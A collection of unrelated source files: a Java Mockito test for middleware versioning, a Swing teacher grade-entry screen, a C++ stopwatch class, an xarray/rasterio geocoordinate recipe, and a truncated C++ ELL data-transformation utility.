m5.setFile(multipartFile.getBytes());
middlewareList = new ArrayList<>();
middlewareList.add(m1);
middlewareList.add(m2);
middlewareList.add(m3);
middlewareList.add(m4);
middlewareList.add(m5);
Property p = new Property();
middlewareProperty = p.getMiddlewares();
middlewareDTO = new MiddlewareDTO();
middlewareDTO.setStatus(Status.ACTIVE);
middlewareDTO.setVersion("0.0.1");
middleware = GenericConverter.mapper(middlewareDTO, Middleware.class);
middleware.setApi(api);
middleware.setPath(root + "/api/" + api.getId() + "/middleware");
middleware.setType("jar");
middleware.setStatus(Status.ACTIVE);
try {
middleware.setFile(multipartFile.getBytes());
} catch (IOException e) {
e.printStackTrace();
}
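// Stub the repositories and property lookups so the service under test operates on the in-memory fixtures built above.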
Mockito.when(middlewareRepository.findByApiId(api.getId())).thenReturn(middlewareList);
Mockito.when(apiRepository.findOne(api.getId())).thenReturn(api);
Mockito.when(interceptorRepository.findByTypeAndOperationResourceApiId(TypeInterceptor.MIDDLEWARE, api.getId()))
.thenReturn(interceptors);
Mockito.when(property.getMiddlewares()).thenReturn(middlewareProperty);
Mockito.when(middlewareRepository.save(middleware)).thenReturn(middleware);
Mockito.when(middlewareRepository.save(middlewareList)).thenReturn(middlewareList);
Mockito.when(middlewareRepository.findByApiIdAndId(api.getId(), m1.getId())).thenReturn(m1);
Mockito.when(middlewareRepository.findByApiIdAndId(api.getId(), m2.getId())).thenReturn(m2);
Mockito.when(middlewareRepository.findByApiIdAndId(api.getId(), m3.getId())).thenReturn(m3);
Mockito.when(middlewareRepository.findByApiIdAndId(api.getId(), m4.getId())).thenReturn(m4);
Mockito.when(middlewareRepository.findByApiIdAndId(api.getId(), m5.getId())).thenReturn(m5);
}
@Test
public void saveNewMiddlewareTest() {
middlewareProperty.setAllowInactive(1);
middlewareProperty.setDeleteDeprecated(true);
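// With a single inactive version allowed and deprecated deletion enabled, only one inactive
// entry should remain and no middleware should be left in the deprecated state.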
Middleware saved = service.save(api.getId(), middlewareDTO, multipartFile);
Map<Status, List<Middleware>> middlewareMap = middlewareList.stream()
.collect(Collectors.groupingBy(Middleware::getStatus));
assertEquals(saved, middleware);
assertEquals(Status.ACTIVE, saved.getStatus());
assertEquals(1, middlewareMap.get(Status.INACTIVE).size());
assertNull(middlewareMap.get(Status.DEPRECATED));
}
@Test
public void propertyNotSetTest() {
middlewareProperty.setAllowInactive(null);
middlewareProperty.setDeleteDeprecated(null);
Middleware saved = service.save(api.getId(), middlewareDTO, multipartFile);
Map<Status, List<Middleware>> middlewareMap = middlewareList.stream()
.collect(Collectors.groupingBy(Middleware::getStatus));
assertEquals(saved, middleware);
assertEquals(Status.ACTIVE, saved.getStatus());
assertEquals(3, middlewareMap.get(Status.INACTIVE).size());
assertEquals(2, middlewareMap.get(Status.DEPRECATED).size());
}
@Test
public void saveNewMiddlewareHugeRollbackTest() {
middlewareProperty.setAllowInactive(99999999);
Middleware saved = service.save(api.getId(), middlewareDTO, multipartFile);
Map<Status, List<Middleware>> middlewareMap = middlewareList.stream()
.collect(Collectors.groupingBy(m -> m.getStatus()));
assertEquals(saved, middleware);
assertEquals(Status.ACTIVE, saved.getStatus());
assertEquals(3, middlewareMap.get(Status.INACTIVE).size());
assertEquals(2, middlewareMap.get(Status.DEPRECATED).size());
}
@Test
public void doNotDeleteDeprecated() {
middlewareProperty.setAllowInactive(1);
middlewareProperty.setDeleteDeprecated(false);
Middleware saved = service.save(api.getId(), middlewareDTO, multipartFile);
Map<Status, List<Middleware>> middlewareMap = middlewareList.stream()
.collect(Collectors.groupingBy(Middleware::getStatus));
assertEquals(saved, middleware);
assertEquals(Status.ACTIVE, saved.getStatus());
assertEquals(1, middlewareMap.get(Status.INACTIVE).size());
assertEquals(4, middlewareMap.get(Status.DEPRECATED).size());
assertNotNull(m2.getFile());
assertNotNull(m3.getFile());
assertNotNull(m4.getFile());
assertNotNull(m5.getFile());
}
@Test
public void deleteDeprecated() {
middlewareProperty.setAllowInactive(1);
middlewareProperty.setDeleteDeprecated(true);
Middleware saved = service.save(api.getId(), middlewareDTO, multipartFile);
Map<Status, List<Middleware>> middlewareMap = middlewareList.stream()
.collect(Collectors.groupingBy(Middleware::getStatus));
assertEquals(saved, middleware);
assertEquals(Status.ACTIVE, saved.getStatus());
assertEquals(1, middlewareMap.get(Status.INACTIVE).size());
assertNull(middlewareMap.get(Status.DEPRECATED));
}
@Test
public void noMiddlewareTest() {
Mockito.when(middlewareRepository.findByApiId(api.getId())).thenReturn(null);
middlewareProperty.setAllowInactive(1);
middlewareProperty.setDeleteDeprecated(true);
Middleware saved = service.save(api.getId(), middlewareDTO, multipartFile);
assertEquals(saved, middleware);
}
@Test
public void findTest() {
Mockito.when(middlewareRepository.findByApiIdAndId(Mockito.anyLong(), Mockito.anyLong())).thenReturn(m1);
Middleware middleware = service.find(1L, 1L);
assertEquals(m1, middleware);
}
@Test
public void findNotFoundTest() {
thrown.expect(NotFoundException.class);
thrown.expectMessage("Resource not found");
Mockito.when(middlewareRepository.findByApiIdAndId(Mockito.anyLong(), Mockito.anyLong())).thenReturn(null);
Middleware middleware = service.find(1L, 1L);
assertEquals(m1, middleware);
}
@Test
public void listPageableTest() {
Mockito.when(apiRepository.findOne(Mockito.anyLong())).thenReturn(api);
Mockito.when(middlewareRepository.findAll(Mockito.any(Example.class), Mockito.any(Pageable.class))).thenReturn(getPageMiddleware());
MiddlewarePage middlewarePage = service.list(1L, new MiddlewareDTO(), new PageableDTO());
assertEquals(middlewareList, middlewarePage.getContent());
}
@Test
public void listTest() {
Mockito.when(apiRepository.findOne(Mockito.anyLong())).thenReturn(api);
Mockito.when(middlewareRepository.findAll(Mockito.any(Example.class))).thenReturn(middlewareList);
List<Middleware> middlewareListActual = service.list(1L, new MiddlewareDTO());
assertEquals(middlewareList, middlewareListActual);
}
@Test
public void deleteTest() {
Mockito.when(middlewareRepository.findByApiIdAndId(Mockito.anyLong(), Mockito.anyLong())).thenReturn(middleware);
service.delete(1L, 1L);
Mockito.verify(middlewareRepository, Mockito.times(1)).findByApiIdAndId(Mockito.anyLong(), Mockito.anyLong());
}
@Test
public void deleteAllTest() {
Mockito.when(middlewareRepository.findByApiIdAndId(Mockito.anyLong(), Mockito.anyLong())).thenReturn(middleware);
Mockito.when(middlewareRepository.findByApiId(Mockito.anyLong())).thenReturn(middlewareList);
service.deleteAll(1L);
Mockito.verify(middlewareRepository, Mockito.times(1)).findByApiId(Mockito.anyLong());
}
@Test
public void updateTest() {
Mockito.when(middlewareRepository.findByApiIdAndId(Mockito.anyLong(), Mockito.anyLong())).thenReturn(middleware);
Mockito.when(middlewareRepository.findByApiIdAndVersion(Mockito.anyLong(), Mockito.anyString())).thenReturn(null);
middleware.setVersion("0.0.2");
Mockito.when(middlewareRepository.save(Mockito.any(Middleware.class))).thenReturn(middleware);
Middleware updated = service.update(1L, 1L, middlewareDTO);
assertEquals(middleware, updated);
}
private Page<Middleware> getPageMiddleware() {
return new Page<Middleware>() {
@Override
public int getTotalPages() {
return 0;
}
@Override
public long getTotalElements() {
return middlewareList.size();
}
@Override
public <S> Page<S> map(Converter<? super Middleware, ? extends S> converter) {
return null;
}
@Override
public int getNumber() {
return 0;
}
@Override
public int getSize() {
return middlewareList.size();
}
@Override
public int getNumberOfElements() {
return middlewareList.size();
}
@Override
public List<Middleware> getContent() {
return middlewareList;
}
@Override
public boolean hasContent() {
return !middlewareList.isEmpty();
}
@Override
public Sort getSort() {
return null;
}
@Override
public boolean isFirst() {
return false;
}
@Override
public boolean isLast() {
return false;
}
@Override
public boolean hasNext() {
return false;
}
@Override
public boolean hasPrevious() {
return false;
}
@Override
public org.springframework.data.domain.Pageable nextPageable() {
return null;
}
@Override
public org.springframework.data.domain.Pageable previousPageable() {
return null;
}
@Override
public Iterator<Middleware> iterator() {
return middlewareList.iterator();
}
};
}
}
| 5,064 |
378 |
<filename>src/com/njupt/sms/ui/HomeTeacher.java<gh_stars>100-1000
package com.njupt.sms.ui;
import com.njupt.sms.Session;
import com.njupt.sms.beans.Course;
import com.njupt.sms.beans.Grade;
import com.njupt.sms.beans.Student;
import com.njupt.sms.beans.Teacher;
import com.njupt.sms.utils.CourseUtils;
import com.njupt.sms.utils.GradeUtils;
import com.njupt.sms.utils.TeacherUtils;
import com.njupt.sms.utils.UICommonUtils;
import javax.swing.*;
import javax.swing.table.AbstractTableModel;
import java.awt.event.*;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
/**
* Created by jason on 9/2/15.
*/
public class HomeTeacher {
private JPanel homeTeacher;
private JButton exitButton;
private JTabbedPane tabbedPane1;
private JTable infoTable;
private JTable table2;
private JTable table3;
private JButton commitButton;
private JButton saveToDraftButton;
private JLabel welcomeNameLabel;
private JFrame frame;
private TeacherInfoModel teacherInfoModel;
private CourseInfoModel courseInfoModel;
private GradeInputModel gradeInputModel;
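// Enable or disable the grade-entry controls (grade table, draft and commit buttons)
// depending on whether the selected course has already been committed.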
public void makeRightAble() {
saveToDraftButton.setEnabled(true);
commitButton.setEnabled(true);
table3.setEnabled(true);
}
public void makeRightDisable() {
saveToDraftButton.setEnabled(false);
commitButton.setEnabled(false);
table3.setEnabled(false);
}
public HomeTeacher() {
// Attach the table models to their tables
teacherInfoModel = new TeacherInfoModel();
infoTable.setModel(teacherInfoModel);
courseInfoModel = new CourseInfoModel();
table2.setModel(courseInfoModel);
gradeInputModel = new GradeInputModel();
table3.setModel(gradeInputModel);
// saveToDraftButton.setEnabled(false);
// commitButton.setEnabled(false);
// table3.setEnabled(false);
frame = new JFrame("HomeTeacher");
frame.setContentPane(homeTeacher);
frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
// frame.pack();
UICommonUtils.makeFrameToCenter(frame);
frame.setVisible(true);
Teacher teacher = (Teacher) Session.userInfo;
welcomeNameLabel.setText(teacher.getName());
exitButton.addActionListener(new ActionListener() {
@Override
public void actionPerformed(ActionEvent e) {
new Login();
frame.dispose();
Session.userInfo = null;
}
});
table2.addMouseListener(new MouseAdapter() {
@Override
public void mouseClicked(MouseEvent e) {
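// Column 0 of the course table holds the course id and column 4 its commit status ("已提交" = committed);
// grades stay editable only while the course has not been committed yet.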
// System.out.println(table2.getSelectedRow());
int courseId = Integer.parseInt(courseInfoModel.getValueAt(table2.getSelectedRow(), 0).toString().trim());
boolean useDraft = !courseInfoModel.getValueAt(table2.getSelectedRow(), 4).toString().equals("已提交");
if (useDraft) {
makeRightAble();
} else {
makeRightDisable();
}
gradeInputModel.setStudentByCourseId(courseId, useDraft);
super.mouseClicked(e);
}
});
saveToDraftButton.addActionListener(new ActionListener() {
@Override
public void actionPerformed(ActionEvent e) {
gradeInputModel.saveToDraft();
courseInfoModel.update();
}
});
commitButton.addActionListener(new ActionListener() {
@Override
public void actionPerformed(ActionEvent e) {
boolean flag = gradeInputModel.commitGrades();
if (flag) {
makeRightDisable();
courseInfoModel.update();
}
}
});
}
private class TeacherInfoModel extends AbstractTableModel {
Teacher teacher = (Teacher) Session.userInfo;
TeacherUtils teacherUtils = new TeacherUtils();
Map<String, Object> map = teacherUtils.findTeacherMapById(teacher.getId());
String[] columnStrings = {"id", "username", "password", "name", "phone", "email"};
String[] columnShowStrings = {"编号","用户名","密码","姓名","电话","邮箱"};
@Override
public int getRowCount() {
return 1;
}
@Override
public int getColumnCount() {
return map.size();
}
@Override
public Object getValueAt(int rowIndex, int columnIndex) {
return map.get(columnStrings[columnIndex]);
}
@Override
public boolean isCellEditable(int rowIndex, int columnIndex) {
return columnIndex == 2 || columnIndex == 4 || columnIndex == 5;
}
@Override
public void setValueAt(Object aValue, int rowIndex, int columnIndex) {
super.setValueAt(aValue, rowIndex, columnIndex);
map.put(columnStrings[columnIndex], aValue);
save();
}
private void save() {
teacherUtils.saveTeacher(map);
}
@Override
public String getColumnName(int column) {
return columnShowStrings[column];
}
}
private class CourseInfoModel extends AbstractTableModel {
Teacher teacher = (Teacher) Session.userInfo;
private CourseUtils courseUtils = new CourseUtils();
private List<Map<String, Object>> list = getAllCourses();
String[] columnStrings = {"id","courseName","academicYear","term","commitStatus"};
String[] columnShowStrings = {"编号","课程名","所属学年","学期","提交状态"};
public void update() {
list = getAllCourses();
fireTableDataChanged();
}
private List<Map<String,Object>> getAllCourses() {
return courseUtils.findAllCoursesByTeacherId(teacher.getId());
}
@Override
public int getRowCount() {
//System.out.println(list);
return list.size();
}
@Override
public int getColumnCount() {
return columnStrings.length;
}
@Override
public Object getValueAt(int rowIndex, int columnIndex) {
Map<String, Object> map = list.get(rowIndex);
return map.get(columnStrings[columnIndex]);
}
@Override
public String getColumnName(int column) {
return columnShowStrings[column];
}
@Override
public boolean isCellEditable(int rowIndex, int columnIndex) {
return false;
}
}
private class GradeInputModel extends AbstractTableModel {
private int courseId;
public int getCourseId() {
return courseId;
}
public void setCourseId(int courseId) {
this.courseId = courseId;
}
private CourseUtils courseUtils = new CourseUtils();
private GradeUtils gradeUtils = new GradeUtils();
private List<Map<String, Object>> list = new ArrayList<>();
String[] columnStrings = {"id","studentCode","name","score","courseId"};
String[] columnShowStrings = {"编号", "学号", "姓名", "成绩"};
public List<Map<String, Object>> getAllStudentByCourseId(int courseId, boolean useDraft) {
if (useDraft) {
return courseUtils.findAllStudentWithGradeDraftByCourseId(courseId);
} else {
return courseUtils.findAllStudentWithGradeByCourseId(courseId);
}
}
public boolean commitGrades() {
for (int i = 0; i < list.size(); i++) {
Map<String, Object> map = list.get(i);
if (map.get("score") == null || "".equals(map.get("score"))) {
JOptionPane.showMessageDialog(frame, "请将成绩填写完整后再提交", "提示", JOptionPane.INFORMATION_MESSAGE);
return false;
}
}
for (int i = 0; i < list.size(); i++) {
Map<String, Object> map = list.get(i);
gradeUtils.saveGrade(map);
courseUtils.commitCourseByCourseId(courseId);
}
return true;
}
/**
* Called to populate the table with the students and grades of the selected course.
*
* @param courseId the id of the selected course
* @param useDraft whether to load draft grades instead of committed ones
*/
public void setStudentByCourseId(int courseId, boolean useDraft) {
this.courseId = courseId;
list = getAllStudentByCourseId(courseId, useDraft);
fireTableDataChanged();
}
public void saveToDraft() {
for (int i = 0; i < list.size(); i++) {
gradeUtils.saveGradeToDraft(list.get(i));
}
courseUtils.draftCourseByCourseId(courseId);
setStudentByCourseId(courseId, true);
}
@Override
public int getRowCount() {
return list.size();
}
@Override
public int getColumnCount() {
return columnShowStrings.length;
}
@Override
public Object getValueAt(int rowIndex, int columnIndex) {
Map<String, Object> map = list.get(rowIndex);
return map.get(columnStrings[columnIndex]);
}
@Override
public String getColumnName(int column) {
return columnShowStrings[column];
}
@Override
public boolean isCellEditable(int rowIndex, int columnIndex) {
return columnIndex == columnShowStrings.length - 1;
}
@Override
public void setValueAt(Object aValue, int rowIndex, int columnIndex) {
Map<String, Object> map = list.get(rowIndex);
map.put(columnStrings[columnIndex], aValue);
}
}
}
| 4,612 |
455 |
#include "Stopwatch.h"
#include "../TimeManager.h"
#include "../Logger.h"
namespace star
{
Stopwatch::Stopwatch()
: m_bPaused(false)
, m_bStarted(false)
, m_TimePairVec()
, m_Laps()
{
}
Stopwatch::Stopwatch(const Stopwatch & yRef)
: m_bPaused(yRef.m_bPaused)
, m_bStarted(yRef.m_bStarted)
, m_TimePairVec(yRef.m_TimePairVec)
, m_Laps(yRef.m_Laps)
{
}
Stopwatch::Stopwatch(Stopwatch && yRef)
: m_bPaused(std::move(yRef.m_bPaused))
, m_bStarted(std::move(yRef.m_bStarted))
, m_TimePairVec(std::move(yRef.m_TimePairVec))
, m_Laps(std::move(yRef.m_Laps))
{
}
Stopwatch::~Stopwatch()
{
}
Stopwatch & Stopwatch::operator=(const Stopwatch & yRef)
{
m_bPaused = yRef.m_bPaused;
m_bStarted = yRef.m_bStarted;
m_TimePairVec = yRef.m_TimePairVec;
m_Laps = yRef.m_Laps;
return * this;
}
Stopwatch & Stopwatch::operator=(Stopwatch && yRef)
{
m_bPaused = std::move(yRef.m_bPaused);
m_bStarted = std::move(yRef.m_bStarted);
m_TimePairVec = std::move(yRef.m_TimePairVec);
m_Laps = std::move(yRef.m_Laps);
return * this;
}
void Stopwatch::Start()
{
if(m_bStarted)
{
LOG(LogLevel::Warning, _T("Stopwatch::Start(): \
Stopwatch already running! Overwriting start time..."), STARENGINE_LOG_TAG);
}
m_TimePairVec.push_back(
std::make_pair(
TimeManager::GetInstance()->CurrentTime(),
Time()
)
);
m_bStarted = true;
m_bPaused = false;
}
void Stopwatch::Stop()
{
m_TimePairVec.back().second = TimeManager::GetInstance()->CurrentTime();
m_bPaused = true;
m_bStarted = false;
}
void Stopwatch::Reset()
{
m_TimePairVec.clear();
m_bStarted = false;
m_bPaused = false;
}
void Stopwatch::Lap()
{
m_Laps.push_back(GetTime());
}
const std::vector<Time> & Stopwatch::GetLapTimes() const
{
return m_Laps;
}
Time Stopwatch::GetTime()
{
Time totalTime;
// While the stopwatch is still running, the last pair has no end time yet, so stamp it
// with the current time; once stopped, keep the end time recorded by Stop().
if(m_bStarted)
{
m_TimePairVec.back().second = TimeManager::GetInstance()->CurrentTime();
}
for(const auto & time : m_TimePairVec)
{
totalTime += time.second - time.first;
}
return totalTime;
}
}
| 1,109 |
2,257 |
"""
.. _recipes.rasterio:
=================================
Parsing rasterio's geocoordinates
=================================
Converting a projection's cartesian coordinates into 2D longitudes and
latitudes.
These new coordinates might be handy for plotting and indexing, but it should
be kept in mind that a grid which is regular in projection coordinates will
likely be irregular in lon/lat. It is often recommended to work in the data's
original map projection (see :ref:`recipes.rasterio_rgb`).
"""
import cartopy.crs as ccrs
import matplotlib.pyplot as plt
import numpy as np
from pyproj import Transformer
import xarray as xr
# Read the data
url = "https://github.com/mapbox/rasterio/raw/master/tests/data/RGB.byte.tif"
da = xr.open_rasterio(url)
# Compute the lon/lat coordinates with pyproj
transformer = Transformer.from_crs(da.crs, "EPSG:4326", always_xy=True)
lon, lat = transformer.transform(*np.meshgrid(da["x"], da["y"]))
da.coords["lon"] = (("y", "x"), lon)
da.coords["lat"] = (("y", "x"), lat)
# Compute a greyscale out of the rgb image
greyscale = da.mean(dim="band")
# Plot on a map
ax = plt.subplot(projection=ccrs.PlateCarree())
greyscale.plot(
ax=ax,
x="lon",
y="lat",
transform=ccrs.PlateCarree(),
cmap="Greys_r",
add_colorbar=False,
)
ax.coastlines("10m", color="r")
plt.show()
| 472 |
2,094 |
////////////////////////////////////////////////////////////////////////////////////////////////////
//
// Project: Embedded Learning Library (ELL)
// File: TransformData.cpp (utilities)
// Authors: <NAME>, <NAME>
//
////////////////////////////////////////////////////////////////////////////////////////////////////
#include "TransformData.h"
#include "DataUtils.h"
#include "ModelUtils.h"
#include <model/include/Map.h>
#include <passes/include/StandardTransformations.h>
#include <utilities/include/Logger.h>
#include <utilities/include/MemoryLayout.h>
#include <memory>
#include <vector>
#include <iostream>
namespace ell
{
using namespace model;
namespace
{
template <typename T1, typename T2>
std::vector<T1> CastVector(const std::vector<T2>& v)
{
auto size = v.size();
std::vector<T1> result(size);
for (size_t i = 0; i < size; ++i)
{
result[i] = static_cast<T1>(v[i]);
}
return result;
}
template <typename DataVector, typename LabelType>
void AddExample(UnlabeledDataContainer& dataset, const DataVector& example, const LabelType& label)
{
dataset.Add(CastVector<float>(example));
}
template <typename DataVector, typename LabelType>
void AddExample(BinaryLabelDataContainer& dataset, const DataVector& data, const LabelType& label)
{
dataset.push_back({ CastVector<float>(data), label });
}
template <typename DataVector, typename LabelType>
void AddExample(MultiClassDataContainer& dataset, const DataVector& data, const LabelType& label)
{
dataset.Add({ CastVector<float>(data), label });
}
template <typename DataVector, typename LabelType>
void AddExample(VectorLabelDataContainer& dataset, const DataVector& data, const LabelType& label)
{
dataset.push_back({ CastVector<float>(data), label });
}
template <typename ExampleType>
auto GetInput(const ExampleType& example)
{
return example.input;
}
template <typename ExampleType>
auto GetOutput(const ExampleType& example)
{
return example.output;
}
template <>
auto GetInput(const UnlabeledExample& example)
{
return example;
}
template <>
auto GetOutput(const UnlabeledExample& example)
{
return 0;
}
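// Recursively walk only the active (non-padded) elements described by the memory layout,
// invoking the visitor once per element in layout order.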
template <typename DataVectorType, typename Visitor>
void Visit(const DataVectorType& data, const utilities::MemoryLayout& layout, int currentDimension, int currentOffset, Visitor visitor)
{
auto offset = layout.GetOffset(currentDimension);
auto length = layout.GetActiveSize(currentDimension);
bool isInnerLoop = currentDimension == layout.NumDimensions() - 1;
for (int i = 0; i < length; ++i)
{
auto index = (i + offset) * layout.GetCumulativeIncrement(currentDimension);
if (isInnerLoop)
{
visitor(data[index + currentOffset]);
}
else
{
Visit(data, layout, currentDimension + 1, currentOffset + index, visitor);
}
}
}
template <typename DataVectorType, typename Visitor>
void Visit(const DataVectorType& data, const utilities::MemoryLayout& layout, Visitor visitor)
{
Visit(data, layout, 0, 0, visitor);
}
const OutputPortBase& AppendInputNode(Model& model, Port::PortType type, const PortMemoryLayout& layout)
{
switch (type)
{
case Port::PortType::smallReal:
{
return model.AddNode<InputNode<float>>(layout)->output;
break;
}
case Port::PortType::real:
{
return model.AddNode<InputNode<double>>(layout)->output;
break;
}
default:
throw utilities::InputException(utilities::InputExceptionErrors::invalidArgument, "Unexpected input type for model. Should be double or float.");
break;
};
}
// Check if we can use cached data at the given port to compute submodel's output
bool IsValidCachePort(const OutputPortBase& begin, const OutputPortBase& end, const OutputPortBase& port)
{
if (&begin == &port || &end == &port)
{
return true;
}
if (&begin == &end)
{
return false;
}
auto node = end.GetNode();
for (auto input : node->GetInputPorts())
{
if (!IsValidCachePort(begin, input->GetReferencedPort(), port))
{
return false;
}
}
return true;
}
} // namespace
// prototypes
template <typename ElementType>
UnlabeledDataContainer TransformDataWithSubmodelImpl(const UnlabeledDataContainer& dataset, ell::model::Submodel& submodel);
template <typename DataContainerType, typename ElementType>
DataContainerType TransformDataInputsWithModelImpl(const DataContainerType& dataset, const OutputPort<ElementType>& output);
template <typename DatasetType>
double GetModelAccuracyImpl(const OutputPortBase& output, const DatasetType& testDataset);
template <typename ElementType, typename DatasetType>
double GetModelAccuracyImpl(const OutputPort<ElementType>& output, const DatasetType& testDataset);
std::unique_ptr<Map> GetMapForModel(const OutputPortBase& output, bool compile, model::IRMapCompiler& compiler);
std::unique_ptr<Map> GetMapForSubmodel(Submodel& submodel, bool compile, model::IRMapCompiler& compiler);
// implementation
UnlabeledDataContainer TransformDataWithSubmodel(const UnlabeledDataContainer& dataset, ell::model::Submodel& submodel, ModelOutputDataCache& dataCache, bool cacheResult)
{
using namespace logging;
auto submodelInputs = submodel.GetInputs();
auto submodelOutputs = submodel.GetOutputs();
// submodels with multiple inputs/outputs are too hairy for this function to deal with currently
if (submodelInputs.size() > 1 || submodelOutputs.size() > 1)
{
Log() << "Skipping caching for complex submodel" << EOL;
return TransformDataWithSubmodel(dataset, submodel);
}
auto submodelOutput = submodelOutputs[0];
const OutputPortBase* submodelInput = nullptr;
if (submodelInputs.size() > 0)
{
submodelInput = &(submodelInputs[0]->GetReferencedPort());
}
else
{
auto inputNode = GetInputNode(*submodelOutput);
submodelInput = &(inputNode->GetOutputPort());
}
// direct cache hit
if (dataCache.HasCachedData(submodelOutput))
{
Log() << "Direct cache hit for port " << submodelOutput->GetFullName() << EOL;
return dataCache.GetCachedData(submodelOutput);
}
auto transformDataset = std::cref(dataset);
auto transformSubmodel = submodel;
const OutputPortBase* cachedOutput = nullptr;
submodel.Visit([&dataCache, &submodelInput, &submodelOutput, &cachedOutput](const Node& node) {
for (auto output : node.GetOutputPorts())
{
// Check if we have cached data here, and if it's valid to use it
if (dataCache.HasCachedData(output))
{
if ((GetInputFanIn(*output, *submodelOutput) == 1) && (IsValidCachePort(*submodelInput, *submodelOutput, *output)))
{
Log() << "Considering cached output " << output->GetFullName() << EOL;
cachedOutput = output;
}
else
{
Log() << "Cached output " << output->GetFullName() << " is invalid" << EOL;
}
}
}
});
if (cachedOutput != nullptr)
{
ModelTransformer transformer;
TransformContext context;
// auto model = submodel.GetModel().ShallowCopy();
// We want the input port along the search path that the input node is connected to
auto originalInputReferences = GetInputReferences(*cachedOutput, *submodelOutput);
Submodel submodelMinusInput = { originalInputReferences, { submodelOutput } };
// Create a new model to copy the submodel to evaluate into it
// First add an input node we can feed the cached dataset into
Model transformModel;
const auto& newInput = AppendInputNode(transformModel, cachedOutput->GetType(), cachedOutput->GetMemoryLayout());
auto onto = std::vector<const OutputPortBase*>(originalInputReferences.size(), &newInput);
auto newSubmodel = transformer.CopySubmodelOnto(submodelMinusInput, transformModel, onto, context);
transformSubmodel = newSubmodel;
transformDataset = dataCache.GetCachedData(cachedOutput);
}
auto result = TransformDataWithSubmodel(transformDataset, transformSubmodel);
if (cacheResult && transformSubmodel.GetOutputs().size() == 1)
{
dataCache.SetCachedData(submodelOutput, result);
}
return result;
}
UnlabeledDataContainer TransformDataWithSubmodel(const UnlabeledDataContainer& dataset, ell::model::Submodel& submodel)
{
switch (submodel.GetOutputs()[0]->GetType())
{
case Port::PortType::smallReal:
{
return TransformDataWithSubmodelImpl<float>(dataset, submodel);
break;
}
case Port::PortType::real:
{
return TransformDataWithSubmodelImpl<double>(dataset, submodel);
break;
}
default:
throw utilities::InputException(utilities::InputExceptionErrors::invalidArgument, "Unexpected output type for model. Should be double or float.");
break;
};
}
template <typename ElementType>
UnlabeledDataContainer TransformDataWithSubmodelImpl(const UnlabeledDataContainer& dataset, ell::model::Submodel& submodel)
{
return TransformDataWithModel(dataset, static_cast<const OutputPort<ElementType>&>(*submodel.GetOutputs()[0]));
}
template <typename ElementType>
UnlabeledDataContainer TransformDataWithModel(const UnlabeledDataContainer& dataset, const OutputPort<ElementType>& output)
{
return TransformDataInputsWithModelImpl(dataset, output);
}
template <typename ElementType>
BinaryLabelDataContainer TransformDataInputsWithModel(const BinaryLabelDataContainer& dataset, const OutputPort<ElementType>& output)
{
return TransformDataInputsWithModelImpl(dataset, output);
}
template <typename ElementType>
MultiClassDataContainer TransformDataInputsWithModel(const MultiClassDataContainer& dataset, const OutputPort<ElementType>& output)
{
return TransformDataInputsWithModelImpl(dataset, output);
}
template <typename ElementType>
VectorLabelDataContainer TransformDataInputsWithModel(const VectorLabelDataContainer& dataset, const OutputPort<ElementType>& output)
{
return TransformDataInputsWithModelImpl(dataset, output);
}
template <typename DataContainerType, typename ElementType>
DataContainerType TransformDataInputsWithModelImpl(const DataContainerType& dataset, const OutputPort<ElementType>& output)
{
const bool compile = true;
// This compiler stuff is here because compiled maps contain a reference to the module emitter inside the compiler.
// If we were to just return the compiled map from `GetMapForModel`, the compiler object within that function would
// disappear and we'd have a dangling reference.
passes::AddStandardTransformationsToRegistry();
MapCompilerOptions settings;
settings.compilerSettings.targetDevice.deviceName = "host";
settings.compilerSettings.allowVectorInstructions = true;
settings.compilerSettings.optimize = true;
model::ModelOptimizerOptions optimizerOptions;
optimizerOptions["fuseLinearFunctionNodes"] = true;
model::IRMapCompiler compiler(settings, optimizerOptions);
auto map = GetMapForModel(output, compile, compiler);
auto inputSize = map->GetInputSize(0);
DataContainerType result;
for (size_t i = 0; i < dataset.Size(); ++i)
{
auto example = dataset[i];
const auto& exampleData = GetInput(example);
std::vector<ElementType> input = CastVector<ElementType>(exampleData.ToArray());
if (input.size() != inputSize)
{
throw utilities::InputException(utilities::InputExceptionErrors::invalidArgument, "dataset has wrong number of elements -- expected " + std::to_string(inputSize) + ", but got " + std::to_string(input.size()));
}
auto pred = map->template Compute<ElementType>(input);
AddExample(result, pred, GetOutput(example));
}
return result;
}
std::unique_ptr<Map> GetMapForModel(const OutputPortBase& output, bool compile, model::IRMapCompiler& compiler)
{
Submodel submodel({ &output });
return GetMapForSubmodel(submodel, compile, compiler);
}
std::unique_ptr<Map> GetMapForSubmodel(Submodel& inputSubmodel, bool compile, model::IRMapCompiler& compiler)
{
TransformContext context;
ModelTransformer transformer;
const auto& output = *inputSubmodel.GetOutputs()[0];
auto newSubmodel = transformer.CopySubmodel(inputSubmodel, context);
const auto& newOutput = transformer.GetCorrespondingOutputs(output);
const auto& newNewOutput = RemoveSourceAndSinkNodes(newOutput);
Submodel submodel({ &newNewOutput });
auto prunedSubmodel = transformer.CopySubmodel(submodel, context);
const auto& prunedOutput = *prunedSubmodel.GetOutputs()[0];
auto inputNode = GetInputNode(prunedOutput);
if (!inputNode)
{
throw utilities::InputException(utilities::InputExceptionErrors::invalidArgument, "Couldn't find input nodes in model");
}
Map map(prunedSubmodel.GetModel(), { { "input", inputNode } }, { { "output", prunedOutput } });
if (!compile)
{
return std::make_unique<Map>(map);
}
// Compile and optimize the model
// passes::AddStandardTransformationsToRegistry();
// MapCompilerOptions settings;
// settings.compilerSettings.targetDevice.deviceName = "host";
// settings.compilerSettings.allowVectorInstructions = true;
// settings.compilerSettings.optimize = true;
// model::ModelOptimizerOptions optimizerOptions;
// optimizerOptions["fuseLinearFunctionNodes"] = true;
// model::IRMapCompiler compiler(settings, optimizerOptions);
auto compiledMap = compiler.Compile(map);
compiledMap.FinishJitting();
return std::make_unique<IRCompiledMap>(std::move(compiledMap));
}
double GetModelAccuracy(const OutputPortBase& output, const BinaryLabelDataContainer& testDataset)
{
return GetModelAccuracyImpl(output, testDataset);
}
double GetModelAccuracy(const OutputPortBase& output, const MultiClassDataContainer& testDataset)
{
return GetModelAccuracyImpl(output, testDataset);
}
template <typename DatasetType>
double GetModelAccuracyImpl(const OutputPortBase& output, const DatasetType& testDataset)
{
switch (output.GetType())
{
case Port::PortType::smallReal:
{
return GetModelAccuracyImpl<float>(static_cast<const OutputPort<float>&>(output), testDataset);
break;
}
case Port::PortType::real:
{
return GetModelAccuracyImpl<double>(static_cast<const OutputPort<double>&>(output), testDataset);
break;
}
default:
